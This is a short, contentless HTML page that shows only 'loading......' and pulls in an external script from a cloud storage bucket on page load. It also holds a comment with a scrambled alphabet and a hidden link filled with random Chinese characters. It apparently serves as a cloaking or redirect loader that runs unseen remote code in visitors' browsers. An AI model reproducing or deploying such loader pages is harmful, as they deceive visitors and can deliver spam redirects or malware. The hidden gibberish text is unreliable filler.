<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1,maximum-scale=1" name="viewport" />
<meta content="yes" name="apple-mobile-web-app-capable" />
<meta content="black" name="apple-mobile-web-app-status-bar-style" />
<meta content="no" name="msapplication-tap-highlight" />
<meta content="IE=edge" http-equiv="X-UA-Compatible" />
<title>....</title>
<script src="//kmdns.oss-cn-shanghai.aliyuncs.com/s.js"></script>
<!-- BArcs8lDfmzRoUXTS0VFeuWpwEt3yONgM2QIGdY96H14qJjkinbxhZva5LPK7C -->
</head>
<body>
loading......
<a style="display: none;">龖嬰鼤跦芆雥橴疦鯝鯍裊賯慤薵姁潯釰瑏僪晝釓嬉顁郥鰖较謻</a>
</body>
</html>
